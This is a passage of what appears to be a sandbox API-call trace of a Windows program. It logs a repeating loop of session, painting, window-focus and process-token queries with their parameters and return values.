(in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.201] WTSFreeMemory (pMemory=0x0) [0221.201] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.202] TextOutW (hdc=0x0, x=1424, y=3324, lpString="", c=0) returned 1 [0221.202] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.202] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.202] GetTickCount () returned 0xe3b8 [0221.204] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.204] SetForegroundWindow (hWnd=0x0) returned 0 [0221.204] BringWindowToTop (hWnd=0x0) returned 0 [0221.204] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x468) returned 1 [0221.204] GetTokenInformation (in: TokenHandle=0x468, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.204] GetLastError () returned 0x7a [0221.204] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.204] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.205] WTSFreeMemory (pMemory=0x0) [0221.205] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.205] TextOutW (hdc=0x0, x=1434, y=3349, lpString="", c=0) returned 1 [0221.205] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.205] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.205] GetTickCount () returned 0xe3b8 [0221.209] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.209] SetForegroundWindow (hWnd=0x0) returned 0 [0221.209] BringWindowToTop (hWnd=0x0) returned 0 [0221.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x46c) returned 1 [0221.209] GetTokenInformation (in: TokenHandle=0x46c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.209] GetLastError () returned 0x7a [0221.209] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.210] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.210] WTSFreeMemory (pMemory=0x0) [0221.210] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.210] TextOutW (hdc=0x0, x=1444, y=3374, lpString="", c=0) returned 1 [0221.210] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.210] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.210] GetTickCount () returned 0xe3c8 [0221.211] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.211] SetForegroundWindow (hWnd=0x0) returned 0 [0221.211] BringWindowToTop (hWnd=0x0) returned 0 [0221.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x470) returned 1 [0221.211] GetTokenInformation (in: TokenHandle=0x470, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.211] GetLastError () returned 0x7a [0221.211] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.211] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.211] WTSFreeMemory (pMemory=0x0) [0221.211] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.212] TextOutW (hdc=0x0, x=1454, y=3399, lpString="", c=0) returned 1 [0221.212] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.212] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.212] GetTickCount () returned 0xe3c8 [0221.212] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.212] SetForegroundWindow (hWnd=0x0) returned 0 [0221.212] BringWindowToTop (hWnd=0x0) returned 0 [0221.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x474) returned 1 [0221.212] GetTokenInformation (in: TokenHandle=0x474, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.212] GetLastError () returned 0x7a [0221.212] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.212] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.213] WTSFreeMemory (pMemory=0x0) [0221.213] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.213] TextOutW (hdc=0x0, x=1464, y=3424, lpString="", c=0) returned 1 [0221.213] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.213] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.213] GetTickCount () returned 0xe3c8 [0221.214] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.214] SetForegroundWindow (hWnd=0x0) returned 0 [0221.215] BringWindowToTop (hWnd=0x0) returned 0 [0221.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x478) returned 1 [0221.215] GetTokenInformation (in: TokenHandle=0x478, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.215] GetLastError () returned 0x7a [0221.215] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.215] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.215] WTSFreeMemory (pMemory=0x0) [0221.215] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.216] TextOutW (hdc=0x0, x=1474, y=3449, lpString="", c=0) returned 1 [0221.216] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.216] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.216] GetTickCount () returned 0xe3c8 [0221.227] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.227] SetForegroundWindow (hWnd=0x0) returned 0 [0221.227] BringWindowToTop (hWnd=0x0) returned 0 [0221.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x47c) returned 1 [0221.227] GetTokenInformation (in: TokenHandle=0x47c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.227] GetLastError () returned 0x7a [0221.227] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.227] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.228] WTSFreeMemory (pMemory=0x0) [0221.228] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.228] TextOutW (hdc=0x0, x=1484, y=3474, lpString="", c=0) returned 1 [0221.228] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.228] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.228] GetTickCount () returned 0xe3d8 [0221.229] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.230] SetForegroundWindow (hWnd=0x0) returned 0 [0221.230] BringWindowToTop (hWnd=0x0) returned 0 [0221.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x480) returned 1 [0221.230] GetTokenInformation (in: TokenHandle=0x480, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.230] GetLastError () returned 0x7a [0221.230] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.230] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.230] WTSFreeMemory (pMemory=0x0) [0221.230] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.230] TextOutW (hdc=0x0, x=1494, y=3499, lpString="", c=0) returned 1 [0221.230] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.231] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.231] GetTickCount () returned 0xe3d8 [0221.232] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.232] SetForegroundWindow (hWnd=0x0) returned 0 [0221.232] BringWindowToTop (hWnd=0x0) returned 0 [0221.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x484) returned 1 [0221.233] GetTokenInformation (in: TokenHandle=0x484, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.233] GetLastError () returned 0x7a [0221.233] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.233] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.233] WTSFreeMemory (pMemory=0x0) [0221.233] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.233] TextOutW (hdc=0x0, x=1504, y=3524, lpString="", c=0) returned 1 [0221.233] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.233] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.233] GetTickCount () returned 0xe3d8 [0221.234] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.234] SetForegroundWindow (hWnd=0x0) returned 0 [0221.234] BringWindowToTop (hWnd=0x0) returned 0 [0221.234] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x488) returned 1 [0221.234] GetTokenInformation (in: TokenHandle=0x488, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.234] GetLastError () returned 0x7a [0221.234] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.234] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.234] WTSFreeMemory (pMemory=0x0) [0221.234] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.234] TextOutW (hdc=0x0, x=1514, y=3549, lpString="", c=0) returned 1 [0221.235] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.235] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.235] GetTickCount () returned 0xe3d8 [0221.235] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.235] SetForegroundWindow (hWnd=0x0) returned 0 [0221.235] BringWindowToTop (hWnd=0x0) returned 0 [0221.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x48c) returned 1 [0221.235] GetTokenInformation (in: TokenHandle=0x48c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.235] GetLastError () returned 0x7a [0221.235] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.235] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.236] WTSFreeMemory (pMemory=0x0) [0221.236] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.236] TextOutW (hdc=0x0, x=1524, y=3574, lpString="", c=0) returned 1 [0221.236] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.236] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.236] GetTickCount () returned 0xe3d8 [0221.238] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.238] SetForegroundWindow (hWnd=0x0) returned 0 [0221.238] BringWindowToTop (hWnd=0x0) returned 0 [0221.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x490) returned 1 [0221.238] GetTokenInformation (in: TokenHandle=0x490, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.238] GetLastError () returned 0x7a [0221.238] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.238] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.239] WTSFreeMemory (pMemory=0x0) [0221.239] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.239] TextOutW (hdc=0x0, x=1534, y=3599, lpString="", c=0) returned 1 [0221.239] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.239] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.239] GetTickCount () returned 0xe3d8 [0221.243] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.243] SetForegroundWindow (hWnd=0x0) returned 0 [0221.243] BringWindowToTop (hWnd=0x0) returned 0 [0221.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x494) returned 1 [0221.244] GetTokenInformation (in: TokenHandle=0x494, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.244] GetLastError () returned 0x7a [0221.244] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.244] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.244] WTSFreeMemory (pMemory=0x0) [0221.244] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.244] TextOutW (hdc=0x0, x=1544, y=3624, lpString="", c=0) returned 1 [0221.244] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.244] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.244] GetTickCount () returned 0xe3e7 [0221.245] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.245] SetForegroundWindow (hWnd=0x0) returned 0 [0221.245] BringWindowToTop (hWnd=0x0) returned 0 [0221.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x498) returned 1 [0221.245] GetTokenInformation (in: TokenHandle=0x498, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.245] GetLastError () returned 0x7a [0221.245] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.245] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.246] WTSFreeMemory (pMemory=0x0) [0221.246] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.246] TextOutW (hdc=0x0, x=1554, y=3649, lpString="", c=0) returned 1 [0221.246] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.246] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.246] GetTickCount () returned 0xe3e7 [0221.249] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.249] SetForegroundWindow (hWnd=0x0) returned 0 [0221.250] BringWindowToTop (hWnd=0x0) returned 0 [0221.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x49c) returned 1 [0221.250] GetTokenInformation (in: TokenHandle=0x49c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.250] GetLastError () returned 0x7a [0221.250] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.250] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.250] WTSFreeMemory (pMemory=0x0) [0221.250] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.250] TextOutW (hdc=0x0, x=1564, y=3674, lpString="", c=0) returned 1 [0221.250] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.250] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.251] GetTickCount () returned 0xe3e7 [0221.260] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.260] SetForegroundWindow (hWnd=0x0) returned 0 [0221.260] BringWindowToTop (hWnd=0x0) returned 0 [0221.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4a0) returned 1 [0221.260] GetTokenInformation (in: TokenHandle=0x4a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.260] GetLastError () returned 0x7a [0221.260] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.260] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.261] WTSFreeMemory (pMemory=0x0) [0221.261] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.261] TextOutW (hdc=0x0, x=1574, y=3699, lpString="", c=0) returned 1 [0221.261] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.261] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.261] GetTickCount () returned 0xe407 [0221.263] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.263] SetForegroundWindow (hWnd=0x0) returned 0 [0221.263] BringWindowToTop (hWnd=0x0) returned 0 [0221.263] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4a4) returned 1 [0221.263] GetTokenInformation (in: TokenHandle=0x4a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.263] GetLastError () returned 0x7a [0221.263] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.263] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.263] WTSFreeMemory (pMemory=0x0) [0221.263] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.264] TextOutW (hdc=0x0, x=1584, y=3724, lpString="", c=0) returned 1 [0221.264] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.264] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.264] GetTickCount () returned 0xe407 [0221.264] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.265] SetForegroundWindow (hWnd=0x0) returned 0 [0221.265] BringWindowToTop (hWnd=0x0) returned 0 [0221.265] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4a8) returned 1 [0221.265] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.265] GetLastError () returned 0x7a [0221.265] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.265] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.265] WTSFreeMemory (pMemory=0x0) [0221.265] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.265] TextOutW (hdc=0x0, x=1594, y=3749, lpString="", c=0) returned 1 [0221.265] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.265] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.265] GetTickCount () returned 0xe407 [0221.266] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.266] SetForegroundWindow (hWnd=0x0) returned 0 [0221.266] BringWindowToTop (hWnd=0x0) returned 0 [0221.266] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4ac) returned 1 [0221.266] GetTokenInformation (in: TokenHandle=0x4ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.266] GetLastError () returned 0x7a [0221.266] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.266] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.267] WTSFreeMemory (pMemory=0x0) [0221.267] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.267] TextOutW (hdc=0x0, x=1604, y=3774, lpString="", c=0) returned 1 [0221.267] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.267] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.267] GetTickCount () returned 0xe407 [0221.267] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.267] SetForegroundWindow (hWnd=0x0) returned 0 [0221.267] BringWindowToTop (hWnd=0x0) returned 0 [0221.268] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4b0) returned 1 [0221.268] GetTokenInformation (in: TokenHandle=0x4b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.268] GetLastError () returned 0x7a [0221.268] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.268] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.268] WTSFreeMemory (pMemory=0x0) [0221.268] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.268] TextOutW (hdc=0x0, x=1614, y=3799, lpString="", c=0) returned 1 [0221.268] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.268] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.268] GetTickCount () returned 0xe407 [0221.269] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.269] SetForegroundWindow (hWnd=0x0) returned 0 [0221.269] BringWindowToTop (hWnd=0x0) returned 0 [0221.269] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4b4) returned 1 [0221.270] GetTokenInformation (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.270] GetLastError () returned 0x7a [0221.270] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.270] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.270] 